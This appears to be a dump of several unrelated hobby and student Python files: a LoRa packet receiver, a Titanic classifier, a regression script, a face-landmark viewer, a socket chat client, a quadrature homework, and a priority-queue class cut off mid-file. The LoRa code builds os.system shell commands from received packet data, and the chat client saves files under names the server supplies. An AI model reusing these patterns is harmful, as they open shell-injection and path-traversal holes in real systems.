getSpreadsheetAck(base_filepath)\n except BaseException as k:\n print(k);\n \n #this if conditions, test different scenarios \n #first scenario: if file was acknowledged for spreadhseets and email, move file to CompleteAcked folder\n #second scenario: if file was acknowledged for spreadhseets and not for email, move file to SpreadsheetAcked folder\n #third scenario: if file was acknowledged for email and not for spreadsheets, move file to EmailAcked folder\n #fourth scenario: if file was not acknowledged either spreadhseets nor for email, move file to Unacked folder\n \n if(isEmailAcked and isSpreadsheetAcked):\n os.system(\"mv \"+ base_filepath + \" ../CloudUpload/CompleteAcked/\" )\n \n elif((not isEmailAcked) and isSpreadsheetAcked):\n os.system(\"mv \"+ base_filepath + \" ../CloudUpload/SpreadsheetAcked/\" )\n elif(isEmailAcked and (not isSpreadsheetAcked)):\n os.system(\"mv \"+ base_filepath + \" ../CloudUpload/EmailAcked/\" )\n \n elif((not isEmailAcked) and (not isSpreadsheetAcked)):\n os.system(\"mv \"+ base_filepath + \" ../CloudUpload/Unacked/\" )\n \n startIntervalTime = endIntervalTime\n try:\n sendUnackedUpload()\n except BaseException as k:\n print(k)\n \n \n \n \n \n packet = None\n # draw a box to clear the image\n display.fill(0)\n display.text('RasPi LoRa', 35, 0, 1)\n\n # check for packet rx\n packet = rfm9x.receive()\n if packet is None:\n display.show()\n display.text('- Waiting for 
PKT -', 15, 20, 1)\n else:\n # Display the packet text and rssi\n display.fill(0)\n prev_packet = packet\n display.text('RX: ', 0, 0, 1)\n display.show()\n time.sleep(1)\n\n #create ack packet to send ack back to the sender\n #pkt_id = prev_packet[-1] #get the packet id, this is the last byte of the byte array\n #ack_msg = bytearray(7) #create byte array of all zeros\n #send_back = ack_msg + pkt_id #append the packet id of the previous packet to this one\n send_back = checksum.checksum(prev_packet) #compute a checksum of the packet received and send it back.\n\n #send ack back to the sender\n if send_back is not None:\n display.fill(0)\n rfm9x.send(bytearray(str(send_back),'UTF-8'))#actual sending of data\n display.text('send ack', 15, 20, 1)\n\n display.show()\n time.sleep(1)\n\n\n \n try: \n agg_data_row = str(prev_packet,'utf-8')\n print(\"aggregate data row = \" , agg_data_row)\n os.system(\"echo \" + \"'\" + agg_data_row + \"'\" + \" >> \" + \"../CloudUpload/agg_data.txt\")\n #timestamp = int.from_bytes(packet_text.split(b' ')[1], 'big')\n #agg_data_row = data_values + \",\" + str(timestamp)\n \n except BaseException as k:\n print(k)\n\n\n #test buttons sending\n #if not btnA.value:\n # Send Button A\n #display.fill(0)\n #button_a_data = bytes(\"Button A!\\r\\n\",\"utf-8\")\n #rfm9x.send(button_a_data)\n #display.text('Sent Button A!', 25, 15, 1)\n #elif not btnB.value:\n # Send Button B\n #display.fill(0)\n #button_b_data = bytes(\"Button B!\\r\\n\",\"utf-8\")\n #rfm9x.send(button_b_data)\n #display.text('Sent Button B!', 25, 15, 1)\n #elif not btnC.value:\n # Send Button C\n #display.fill(0)\n #button_c_data = bytes(\"Button C!\\r\\n\",\"utf-8\")\n #rfm9x.send(button_c_data)\n #display.text('Sent Button C!', 25, 15, 1)\n\n\n display.show()\n time.sleep(0.1)\n","repo_name":"mcenek/TeamLiftCSWaterProject","sub_path":"lora/loraReceiver.py","file_name":"loraReceiver.py","file_ext":"py","file_size_in_byte":7445,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"6"} +{"seq_id":"37296797763","text":"\n# coding: utf-8\n\n#
Titanic
\n#RMS Titanic was a British passenger liner that sank in the North Atlantic Ocean in the early hours of 15 April 1912, after colliding with an iceberg during its maiden voyage from Southampton to New York City. There were an estimated 2,224 passengers and crew aboard, and more than 1,500 died, making it one of the deadliest commercial peacetime maritime disasters in modern history. RMS Titanic was the largest ship afloat at the time it entered service and was the second of three Olympic-class ocean liners operated by the White Star Line. It was built by the Harland and Wolff shipyard in Belfast. ~Wikipedia\n#The iceberg unraveled the ship's hull at a length of 90 meters - the length of the hull plating was 90 m, but on the basis of the examination of the size of damage it was clearly stated that it was a series of cracks, the total area of which was just over 1 square meter (1.18), that is, it was equal to the body surface of an adult human.\n# This is my first more extensive program. Writing it, I start my adventure with \"more serious programming\". This is a secound aproach, this time with OOP.\n\n#
Chapters:
\n#\n#1. Library and data import\n#2. Analysis, data cleaning and visualization\n#3. Preparation of data for the model\n#4. Creating a model\n#5. Analysis of correctness of the solution and visualization\n#6. Method analysis\n#7. Reporting the solution on kaggle\n#\n\n#1. Library and data import\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt #Plotting library\n\nget_ipython().run_line_magic('matplotlib', 'inline')\n\ntry:\n train = pd.DataFrame(pd.read_csv('data/train.csv'))\n test = pd.DataFrame(pd.read_csv('data/test.csv'))\n test_w = pd.DataFrame(pd.read_csv('data/test.csv'))\nexcept FileNotFoundError:\n print(\"Błędna ścieżka\")\n\ntest.set_index('PassengerId', inplace=True)\ntrain.set_index('PassengerId', inplace=True)\n\n#2. Analysis, data cleaning and visualization\n\n#\n#2.1. Sex
\n#2.2. Class\n#2.3. Embarkation\n#2.4. Family size\n#2.5. Fare
\n#
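# Editor's sketch (not in the original notebook): the per-feature survival rates that section 2 inspects can be cross-checked with a direct pandas groupby, using the train DataFrame read from data/train.csv above; the helper functions the notebook actually uses are defined just below.
for col in ('Sex', 'Pclass', 'Embarked'):
    # mean of the 0/1 Survived column per category == survival rate
    print(train.groupby(col)['Survived'].mean())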
\n\ndef info_null(column):\n return column.isnull().sum()\n\ndef filling_NaN(column):\n null_n = info_null(column)\n \n if null_n > 0 and (null_n <= 50):\n message = 'There are %d fields missing, they are filled with most common value: \"%s\"' % (null_n, column.mode()[0])\n column.fillna(column.mode()[0], inplace = True)\n if null_n > 50:\n message = 'There is over 50 empty fields. A more accurate approximation is recommended.' \n else:\n message = 'There are no empty fields.'\n \n return message\n\ndef family_merge(dataset):\n if 'FamilySize' not in dataset.columns:\n dataset['FamilySize'] = dataset['Parch'] + dataset['SibSp']\n\ndef info_discrete(column):\n print(filling_NaN(column))\n \n categories = column.unique()\n survived_perc = list()\n labels = list()\n for label in categories:\n labels.append(label)\n survived_perc.append([label, train.Survived[column == label].value_counts(normalize=True).sort_index()][1][1])\n\n plot1 = plt.plot(labels, survived_perc, 'bo')\n plt.title('Survival rate('+column.name+')')\n return plot1\n\ndef info_continous(column, step):\n print(filling_NaN(column))\n \n scope = column.max() - column.min() - step\n survived_perc = list()\n labels = list()\n for i in range(0, int(scope), step):\n survived_perc.append(train.Survived[column.between(i, i+5)].mean())\n labels.append(i)\n \n plot2 = plt.plot(labels, survived_perc, 'bo', ls = '-')\n plt.title('Survival rate('+column.name+')')\n return plot2\n\ndef number_cases(column, step):\n scope = column.max() - column.min() - step\n survived_num = list()\n labels = list()\n for i in range(0, int(scope), step):\n survived_num.append(train.Survived[column.between(i, i+5)].count())\n labels.append(i)\n \n plot3 = plt.bar(labels, survived_num, align = 'center')\n plt.title('Number of cases('+column.name+')')\n return plot3\n\ninfo_discrete(train['Sex'])\n\ninfo_discrete(train['Pclass'])\n\ninfo_discrete(train['Embarked'])\n\ninfo_continous(train['Age'],3)\n\nnumber_cases(train['Age'],1)\n\ninfo_continous(train['Fare'],8)\n\nnumber_cases(train['Fare'],8)\n\n#Due to the small amount of cases and shape of the previous graph showing the percentage of survivors, values above 50 inclusive will be marked as 50.\n\nfamily_merge(train)\nfamily_merge(test)\n\ninfo_continous(train['FamilySize'],1)\n\nnumber_cases(train['FamilySize'],1)\n\n#
3. Data preparation
\n\ntest['Fare'].fillna(int(test['Fare'].median()), inplace = True)\n\n\ntrain.drop(['Ticket', 'Cabin', 'Name'], axis = 1,inplace = True)\ntest.drop(['Ticket', 'Cabin', 'Name'], axis = 1, inplace = True)\n\ntest['Sex'] = test['Sex'].map({'female': 0, 'male': 1}).astype(int)\ntrain['Sex'] = train['Sex'].map({'female': 0, 'male': 1}).astype(int)\n\ndata = train.append(test, sort = True)\n\nfor i in range(1,1310):\n if data.loc[i, 'Sex'] == 1 and (data.loc[i, 'Pclass'] == 1):\n if np.isnan(data.loc[i, 'Age']):\n data.loc[i, 'Age'] = 41\n if data.loc[i, 'Sex'] == 0 and (data.loc[i, 'Pclass'] == 1):\n if np.isnan(data.loc[i, 'Age']):\n data.loc[i, 'Age'] = 37\n if data.loc[i, 'Sex'] == 1 and (data.loc[i, 'Pclass'] == 2):\n if np.isnan(data.loc[i, 'Age']):\n data.loc[i, 'Age'] = 31\n if data.loc[i, 'Sex'] == 0 and (data.loc[i, 'Pclass'] == 2):\n if np.isnan(data.loc[i, 'Age']):\n data.loc[i, 'Age'] = 27\n if data.loc[i, 'Sex'] == 1 and (data.loc[i, 'Pclass'] == 3):\n if np.isnan(data.loc[i, 'Age']):\n data.loc[i, 'Age'] = 26\n if data.loc[i, 'Sex'] == 0 and (data.loc[i, 'Pclass'] == 3):\n if np.isnan(data.loc[i, 'Age']):\n data.loc[i, 'Age'] = 22\n\ndata.drop(['SibSp', 'Parch'],axis=1,inplace=True)\n\ndata['Embarked'] = data['Embarked'].map({'S':1, 'C':2, 'Q':3}).astype(int)\n\ndata.loc[ data['Fare'] > 50, 'Fare'] = 50\ndata['Fare'] = data['Fare'].astype(int)\n\ntraining = data.iloc[:891,:]\ntesting = data.iloc[891:,:]\ntrainY = training['Survived']\ntrainX = training.drop(['Survived'], axis = 1)\ntestX = testing.drop(['Survived'], axis = 1)\n\n#
4. Model
\n\n\n# machine learning\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.svm import SVC, LinearSVC\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.linear_model import Perceptron\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.tree import DecisionTreeClassifier\n\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import cross_val_score\n\n# creating odd list of K for KNN\nmyList = list(range(1,50))\n\n# subsetting just the odd ones\nneighbors = list(range(1,50))\n\n# empty list that will hold cv scores\ncv_scores = []\n\n# perform 10-fold cross validation\nfor k in neighbors:\n knn = KNeighborsClassifier(n_neighbors=k)\n scores = cross_val_score(knn, trainX, trainY, cv=10, scoring='f1')\n cv_scores.append(scores.mean())\n \nfrom sklearn.metrics import accuracy_score\n# changing to misclassification error\nMSE = [1 - x for x in cv_scores]\n\n# determining best k\noptimal_k = neighbors[MSE.index(min(MSE))]\nprint(\"The optimal number of neighbors is %d\" % optimal_k)\n\n# plot misclassification error vs k\nplt.plot(neighbors, MSE)\nplt.xlabel('Number of Neighbors K')\nplt.ylabel('Misclassification Error')\nplt.show()\n\ndef model_choice(trainX, trainY, testX):\n from sklearn.linear_model import LogisticRegression\n from sklearn.svm import SVC, LinearSVC\n from sklearn.ensemble import RandomForestClassifier\n from sklearn.neighbors import KNeighborsClassifier\n from sklearn.naive_bayes import GaussianNB\n from sklearn.linear_model import Perceptron\n from sklearn.linear_model import SGDClassifier\n from sklearn.tree import DecisionTreeClassifier\n \n reglog = LogisticRegression()\n reglog.fit(trainX, trainY)\n Y_predLR = reglog.predict(testX)\n acc_log = round(reglog.score(trainX, trainY) * 100, 2)\n \n knn = KNeighborsClassifier(n_neighbors = 5)\n knn.fit(trainX, trainY)\n Y_predKNN = knn.predict(testX)\n acc_knn = round(knn.score(trainX, trainY) * 100, 2)\n\n gaussian = GaussianNB()\n gaussian.fit(trainX, trainY)\n Y_predG = gaussian.predict(testX)\n acc_gaussian = round(gaussian.score(trainX, trainY) * 100, 2)\n\n perceptron = Perceptron()\n perceptron.fit(trainX, trainY)\n Y_predP = perceptron.predict(testX)\n acc_perceptron = round(perceptron.score(trainX, trainY) * 100, 2)\n\n svc = SVC()\n svc.fit(trainX, trainY)\n Y_pred = svc.predict(testX)\n acc_svc = round(svc.score(trainX, trainY) * 100, 2)\n\n linear_svc = LinearSVC()\n linear_svc.fit(trainX, trainY)\n Y_predLSVC = linear_svc.predict(testX)\n acc_linear_svc = round(linear_svc.score(trainX, trainY) * 100, 2)\n\n sgd = SGDClassifier()\n sgd.fit(trainX, trainY)\n Y_predSGD = sgd.predict(testX)\n acc_sgd = round(sgd.score(trainX, trainY) * 100, 2)\n\n decision_tree = DecisionTreeClassifier()\n decision_tree.fit(trainX, trainY)\n Y_predD = decision_tree.predict(testX)\n acc_decision_tree = round(decision_tree.score(trainX, trainY) * 100, 2)\n\n random_forest = RandomForestClassifier(n_estimators=400, max_features = 'sqrt', oob_score = True, n_jobs = -1)\n random_forest.fit(trainX, trainY)\n Y_predRF = random_forest.predict(testX)\n random_forest.score(trainX, trainY)\n acc_random_forest = round(random_forest.score(trainX, trainY) * 100, 2)\n\n print('LogisticRegression =', acc_log)\n print('KNeighborsClassifier =', acc_knn)\n print('GaussianNB =', acc_gaussian)\n print('Perceptron =', acc_perceptron)\n print('LinearSVC =', acc_linear_svc)\n print('SVC =', 
acc_svc)\n print('SGDClassifier =', acc_sgd)\n print('DecisionTreeClassifier =', acc_decision_tree)\n print('RandomForestClassifier =', acc_random_forest)\n\nmodel_choice(trainX, trainY, testX)\n\nfrom sklearn.ensemble import RandomForestClassifier\n\nrandom_forest = RandomForestClassifier(n_estimators=400, max_features = 'sqrt', oob_score = True, n_jobs = -1)\nrandom_forest.fit(trainX, trainY)\nY_predRF = random_forest.predict(testX).astype('int64', copy = False)\nrandom_forest.score(trainX, trainY)\nacc_random_forest = round(random_forest.score(trainX, trainY) * 100, 2)\n\nsubmission = pd.DataFrame({\n \"PassengerId\": test_w[\"PassengerId\"],\n \"Survived\": Y_predRF\n })\n\nsubmission.to_csv('/home/jan/Dokumenty/MINT/Kaggle/Tytanic/submission.csv', index=False)\n","repo_name":"jantar44/titanic","sub_path":"Tytanic.py","file_name":"Tytanic.py","file_ext":"py","file_size_in_byte":10659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"14260173029","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.feature_extraction.text import TfidfVectorizer, TfidfTransformer\nfrom scipy.sparse import hstack\nfrom sklearn.metrics import mean_squared_error\nfrom math import sqrt\nimport pickle\nimport argparse\n\nclass LinReg():\n \"\"\"Train, Test and Visualise a Linear Reg Model\"\"\"\n\n def __init__(self, data_loc):\n self.data_loc = data_loc\n\n def train_data(self, loc = None ,split = 0.1) :\n data = pd.read_csv(self.data_loc)\n data[\"original\"].str.lower()\n data[\"edit\"].str.lower()\n\n feature_cols = [\"original\", \"edit\"]\n X = data[feature_cols]\n y = data[[\"meanGrade\"]]\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=split)\n vectorizer = TfidfVectorizer(sublinear_tf=True, min_df=2, norm='l2',\n ngram_range=(1, 2), stop_words='english')\n X_train_o = vectorizer.fit_transform(X_train[\"original\"], X_train[\"edit\"])\n X_test_o = vectorizer.transform(X_test[\"original\"], X_test[\"edit\"])\n\n linreg = LinearRegression()\n linreg.fit(X_train_o, y_train)\n pred = linreg.predict(X_test_o)\n\n lis1 = y_test[\"meanGrade\"].values.tolist()\n print_data = X_test\n print_data[\"meanGrade\"] = lis1\n print_data[\"PredGrade\"] = pred\n lis2 = print_data.values.tolist()\n\n for i in lis2:\n print(\"original:\",i[0], \"Edited Word:\", i[1], \"Mean Grade:\",i[2], \"Prediction:\",i[3])\n print('Mean squared error: %.2f'\n % sqrt(mean_squared_error(y_test, pred)))\n\n filename1 = loc + 'finalized_model.sav'\n fileneame2 = loc + \"feature.pkl\"\n pickle.dump(linreg, open(filename1, 'wb'))\n pickle.dump(vectorizer.vocabulary_,open(fileneame2,\"wb\"))\n\n def test_data(self, loc):\n filename1 = loc + 'finalized_model.sav'\n fileneame2 = loc + \"feature.pkl\"\n data = pd.read_csv(self.data_loc)\n data[\"original\"].str.lower()\n data[\"edit\"].str.lower()\n\n feature_cols = [\"original\", \"edit\"]\n X = data[feature_cols]\n y = data[[\"meanGrade\"]]\n\n transformer = TfidfTransformer()\n vectorizer = TfidfVectorizer(decode_error=\"replace\",\n vocabulary=pickle.load(open(fileneame2, \"rb\")))\n X_o = vectorizer.fit_transform(X[\"original\"], X[\"edit\"])\n linreg = pickle.load(open(filename1, \"rb\"))\n pred = linreg.predict(X_o)\n lis1 = y[\"meanGrade\"].values.tolist()\n print_data = X\n print_data[\"meanGrade\"] = lis1\n print_data[\"PredGrade\"] = pred\n lis2 = print_data.values.tolist()\n\n for i in 
lis2:\n print(\"original:\",i[0], \"Edited Word:\", i[1], \"Mean Grade:\",i[2], \"Prediction:\",i[3])\n # print(\"original:\",i[0], \"Edited Word:\", i[1], \"Prediction:\",i[2])\n print('Mean squared error: %.2f'\n % sqrt(mean_squared_error(y, pred)))\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"-tr\", \"--train\", dest = \"tr\", help=\"Training Mode\")\n parser.add_argument(\"-te\", \"--test\", dest = \"te\", help=\"Testing Mode\")\n parser.add_argument(\"-m\", \"--model\", dest = \"m\", help=\"Path of Model\")\n parser.add_argument(\"-ds\", \"--dataset\", dest = \"ds\", help=\"Path of Dataset\")\n parser.add_argument(\"-tts\", \"--train_test_split\", dest = \"tts\", help=\"Split Ratio\")\n\n args = parser.parse_args()\n if args.tr != None:\n try:\n data = args.ds\n model = args.m\n lr = LinReg(data)\n except:\n print(\"Format is: -ds ./data/file -m ./model/ -tts optional\")\n lr.train_data(model, args.tts)\n elif args.te != None:\n try:\n data = args.ds\n model = args.m\n lr = LinReg(data)\n except:\n print(\"Format is: -ds ./data/file -m ./model/\")\n lr.test_data(model)\n else:\n print(\"Oops, invalid command!\")\n","repo_name":"shivamkumarsingh114/NLP-Project","sub_path":"task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":4179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"20862646153","text":"#input one image\n#detect facial landmarks\n#show image with detected facial landmarks\n#show image with normalized facial landmarks\n\n\nimport cv2\nimport numpy as np\n\nfrom FacialLandmarkDetection import *\nfrom Database_loader import *\n\n\n#shows image inside a windows\ndef showImage_more(img,text, gray=False):\n if gray==True:\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n cv2.putText(img,text , (20, 20), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (0, 255, 0), 1, cv2.LINE_AA)\n window_name = \"window_\" + text\n cv2.imshow(window_name,img)\n #cv2.waitKey(0)\n\n\nif __name__ == \"__main__\":\n \n templates_database = \"/home/matej/Diplomski/baze/Templates/baza_templates\"\n imagePath_same1 = \"/home/matej/Diplomski/baze/baze_original/baza_XMVTS2/000/000_1_1.ppm\"\n imagePath_same2 = \"/home/matej/Diplomski/baze/baze_original/baza_XMVTS2/003/003_1_1.ppm\"\n imagePath_same3 = \"/home/matej/Diplomski/baze/baze_original/baza_XMVTS2/004/004_1_1.ppm\"\n imagePath_same4 = \"/home/matej/Diplomski/baze/baze_original/baza_XMVTS2/041/041_1_1.ppm\"\n imagePath_same5 = \"/home/matej/Diplomski/baze/baze_original/baza_XMVTS2/134/134_1_1.ppm\"\n \n image_path_man_no_glasses = \"/home/matej/Diplomski/baze/deidentification_database/Deidentification_main/man_no_glasses/143_1_1.ppm\"\n image_path_man_glasses = \"/home/matej/Diplomski/baze/deidentification_database/Deidentification_main/man_glasses/113_1_1.ppm\"\n image_path_woman_no_glasses = \"/home/matej/Diplomski/baze/deidentification_database/Deidentification_main/woman_no_glasses/154_1_1.ppm\"\n image_path_woman_glasses = \"/home/matej/Diplomski/baze/deidentification_database/Deidentification_main/woman_glasses/250_1_1.ppm\"\n \n imagePath = image_path_man_glasses #chose image to use!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n \n \n destination_deident = \"\"\n \n #show original image\n detector = FacialLandmarkDetector(imagePath)\n \n #get landmarks drawn on image\n image_original = detector.detectFacialLandmarks_get_image()\n showImage_more(img=image_original, text=\"original\", gray=False)\n \n #get landmarks on black 
background\n image_landmarks = detector.detectFacialLandmarks(draw=False, normalize=False)\n \n image_orig_black_white = np.zeros((image_original.shape[0], image_original.shape[1]), dtype=np.float64)\n \n for position in image_landmarks:\n cv2.circle(image_orig_black_white,(position[0],position[1]), 3, (1,1,1), -1)\n \n showImage_more(img=image_orig_black_white, text=\"black_white\", gray=False)\n \n #get normalized landmarks on black background\n image_landmarks_norm = detector.detectFacialLandmarks(draw=False, normalize=True)\n \n image_orig_black_white_norm = np.zeros((image_original.shape[0], image_original.shape[1]), dtype=np.float64)\n \n \n for position in image_landmarks_norm:\n x = ((position[0] * (image_original.shape[0]/4))+image_original.shape[0]/4).astype(np.int32)\n y = ((position[1] * (image_original.shape[0]/4))+image_original.shape[0]/4).astype(np.int32)\n \n cv2.circle(image_orig_black_white_norm,(x,y), 3, (1,1,1), -1)\n \n showImage_more(img=image_orig_black_white_norm, text=\"black_white_norm\", gray=False)\n\n \n #show template images\n \n cv2.waitKey(0)\n cv2.destroyAllWindows()\n","repo_name":"matejcrnac/Face_deidentification_kazemi","sub_path":"facial_landmarks_normalized_visualization.py","file_name":"facial_landmarks_normalized_visualization.py","file_ext":"py","file_size_in_byte":3316,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"69958800189","text":"import socket\nfrom colorama import Fore\nimport threading\nimport pathlib\nimport os\n\nBASEDIR = pathlib.Path(__file__).parent\n\nPORT = 9091 # server port\nHOST = \"localhost\" # server id\nSEP = \"<&sep&>\" # seperator for seperating data in a single send\nBUFFER_SIZE = 1024\nDOWNLOAD_FOLDER = BASEDIR / \"downloads\"\n\n\n# creat folder if not exist\nif not DOWNLOAD_FOLDER.exists():\n DOWNLOAD_FOLDER.mkdir()\n\n\ndef resive_msg(soc: socket):\n while True:\n # get msg from server and process it\n msg = soc.recv(BUFFER_SIZE)\n if not msg:\n soc.close()\n break\n msg = msg.decode(\"utf-8\").split(SEP)\n if msg[0] == \"JOIN\":\n # somebody joind the group chat\n msg = msg[1]\n print(Fore.YELLOW + msg)\n print(Fore.BLUE)\n elif msg[0] == \"DISCONNET\":\n # sombody left group chat\n msg = msg[1]\n print(Fore.RED + msg)\n print(Fore.BLUE)\n elif msg[0] == \"ERROR\":\n # error msg , didint acctually use it\n msg = msg[1]\n print(Fore.RED + msg)\n print(Fore.BLUE)\n elif msg[0] == \"SENDINGFILE\":\n # recive file from client\n file_name = msg[1]\n file_size = int(msg[2])\n with open(DOWNLOAD_FOLDER / file_name, \"wb\") as file:\n current_size = 0\n while current_size < file_size:\n msg = soc.recv(BUFFER_SIZE)\n file.write(msg)\n current_size += len(msg)\n print(Fore.GREEN + f\"recived file {file_name}\")\n print(Fore.BLUE)\n else:\n # sombody sad something in chat\n print(Fore.GREEN + msg[0] + \": \" + Fore.MAGENTA + msg[1])\n print(Fore.BLUE)\n\n\nwith socket.socket(socket.AF_INET, socket.SOCK_STREAM) as soc:\n soc.connect((HOST, PORT))\n msg = soc.recv(BUFFER_SIZE).decode(\"utf-8\")\n if msg == \"NICK\":\n # send nickname\n nick = input(\"Enter Nickname:\")\n soc.send(nick.encode(\"utf-8\"))\n # handle reciving msg from server on another thread\n t = threading.Thread(target=resive_msg, args=(soc,))\n t.daemon = True\n t.start()\n while True:\n msg = input(\"\")\n # exist if typed\n if msg == \"exit()\":\n soc.close()\n break\n # send file to server\n # handeld here\n elif msg.split(\":\")[0] == \"sfile\":\n file_path = msg.split(\":\")[1].replace('\"', 
\"\").replace(\"'\", \"\")\n file_name = os.path.basename(file_path)\n file_size = os.path.getsize(file_path)\n soc.send(f\"SENDFILE{SEP}{file_name}{SEP}{file_size}\".encode(\"utf-8\"))\n with open(file_path, \"rb\") as file:\n line = file.read(BUFFER_SIZE)\n while line:\n soc.send(line)\n line = file.read(BUFFER_SIZE)\n print(Fore.GREEN + f\"Sending file {file_name} done\")\n continue\n # recive file from server handeled in resive_msg\n elif msg.split(\":\")[0] == \"gfile\":\n file_name = msg.split(\":\")[1]\n soc.send(f\"REQUESTFILE{SEP}{file_name}\".encode(\"utf-8\"))\n else:\n # user typed a msg for chat\n soc.send(msg.encode(\"utf-8\"))\n\n else:\n print(\"failed\")\n soc.close()\n","repo_name":"amiravtar/socket_chat","sub_path":"python/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"211309087","text":"'''\nAuthor: Jason Li\nAssignment: Scientific Computing HW1\nProfessor: DuPont\nDate: 10/2/2017\n'''\n\nimport matplotlib.pyplot as plt\n\nimport numpy\nimport math\n\ndef function1(x):\n\treturn x**2\n\ndef function2(x):\n\treturn math.sqrt(math.sin(math.pi*(x/2)))\n\ndef function3(x):\n\treturn x**4\n\ndef function4(x):\n\tif(x < 1.0/3.0):\n\t\treturn 1\n\telse:\n\t\treturn 0\n\nmaxLevel = 0\nnumFunctCalls = 0\ngoodInterval = []\ngoodMidpoint = []\n\ndef recursion(mathFunct, a, b, tolerance, level, coarseArea=None):\n\tglobal numFunctCalls\n\tglobal maxLevel\n\tglobal goodInterval\n\tglobal goodMidpoint\n\tmidpoint = (a + b) / 2.0\n\tif coarseArea is None:\n\t\tcoarseArea = mathFunct(midpoint) * (b - a)\n\t\tnumFunctCalls += 1\n\n\tfineLeft = mathFunct((a + midpoint) / 2.0) * (midpoint - a)\n\tfineRight = mathFunct((b + midpoint) / 2.0) * (b - midpoint)\n\tfineArea = fineLeft + fineRight\n\tinterval = b-a\n\tgoodInterval.append(interval)\n\tgoodMidpoint.append(midpoint)\n\tnumFunctCalls += 2\n\tlevel += 1\n\tif level >= 30:\n\t\tmaxLevel = 30\n\t\treturn fineArea\n\tif level < 4:\n\t\treturn recursion(mathFunct, a, midpoint, tolerance / 2.0, level, coarseArea=fineLeft) + recursion(mathFunct, midpoint, b, tolerance / 2.0, level, coarseArea=fineRight)\n\tif abs(float(coarseArea) - float(fineArea)) <= tolerance:\n\t\tif level >= maxLevel:\n\t\t\tmaxLevel = level\n\t\treturn fineArea\n\telse:\n\t\treturn recursion(mathFunct, a, midpoint, tolerance / 2.0, level, coarseArea=fineLeft) + recursion(mathFunct, midpoint, b, tolerance / 2.0, level, coarseArea=fineRight)\n\ndef plotEvals(mathFunct, a, b):\n\tglobal numFunctCalls\n\tglobal maxLevel\n\tplotData = []\n\ttols = [0.01, 0.003, 0.001, 0.0003, 0.0001, 0.00003, 0.00001, 0.000003, 0.000001]\n\tfor tol in tols:\n\t\tplotData.append([recursion(mathFunct, a, b, tol, 0), numFunctCalls])\n\t\tnumFunctCalls = 0\n\t\tmaxLevel = 0\n\n\tlogNumFunctCalls = [math.log(x[1]) for x in plotData]\n\tlogTol = [math.log(1/x) for x in tols]\n\tplt.plot(logTol, logNumFunctCalls)\n\tplt.title(mathFunct)\n\tplt.xlabel(\"log of inverse tolerance\")\n\tplt.ylabel(\"log of inverse of num function evals\")\n\tplt.show()\n\nplotEvals(function1, 0, 2)\nplotEvals(function2, 0, 1)\nplotEvals(function3, -1, 1)\nplotEvals(function4, 0, 1)\n\ndef plotError(mathFunct, a, b):\n\tglobal numFunctCalls\n\tglobal maxLevel\n\tlogErrors = []\n\tplotData = []\n\tlowTol = 0.0000000001\n\ttols = [0.01, 0.003, 0.001, 0.0003, 0.0001, 0.00003, 0.00001, 0.000003, 0.000001]\n\tactualValue = recursion(mathFunct, a, b, lowTol, 
0)\n\tprint(actualValue)\n\tfor tol in tols:\n\t\tactError = abs (recursion(mathFunct, a, b, tol, 0) - actualValue)\n\t\tplotData.append(actError)\n\t\tprint(actError)\n\t\tnumFunctCalls = 0\n\t\tmaxLevel = 0\n\n\tfor x in plotData:\n\t\ttry:\n\t\t\tlogErrors.append(math.log(1.0/x))\n\t\texcept:\n\t\t\tlogErrors.append(numpy.inf)\n\n\tlogTol = [math.log(1.0/x) for x in tols]\n\n\n\tplt.plot(logTol, logErrors)\n\tplt.title(mathFunct)\n\tplt.xlabel(\"log of inverse tolerance\")\n\tplt.ylabel(\"log of inverse actual error\")\n\tplt.show()\n\nplotError(function1, 0, 2)\nplotError(function2, 0, 1)\nplotError(function3, -1, 1)\nplotError(function4, 0, 1)\n\ndef plotGoodInterval(mathFunct, a, b):\n\tglobal goodInterval\n\tglobal goodMidpoint\n\thardTol = 0.0003\n\n\tgoodInterval = []\n\tgoodMidpoint = []\n\tlogInterval = []\n\n\trecursion(mathFunct, a, b, hardTol, 0)\n\tfor x in goodInterval:\n\t\tlogInterval.append(-math.log(x))\n\n\tplt.plot(goodMidpoint, goodInterval)\n\tplt.title(mathFunct)\n\tplt.xlabel(\"x position\")\n\tplt.ylabel(\"negative log of good interval\")\n\tplt.show()\n\nplotGoodInterval(function1, 0, 2)\nplotGoodInterval(function2, 0, 1)\nplotGoodInterval(function3, -1, 1)\nplotGoodInterval(function4, 0, 1)\n","repo_name":"jasonli2310/scientific-computing","sub_path":"assignment1.py","file_name":"assignment1.py","file_ext":"py","file_size_in_byte":3538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"21807592036","text":"# A max priority queue abstract data type to insert pairs of the form (datum, priority).\n# If a pair is inserted with a datum that already occurs in the priority queue, then\n# the priority is (possibly) changed to the (possibly) new value.\n#\n# Written by Eric Martin for COMP9021\n\n\nMIN_CAPACITY = 10\n\n\nclass PriorityQueue():\n def __init__(self, capacity = MIN_CAPACITY):\n self._data = [None] * capacity\n self._length = 0\n self._locations = {}\n \n def __len__(self):\n return self._length\n\n def is_empty(self):\n return self._length == 0\n\n def 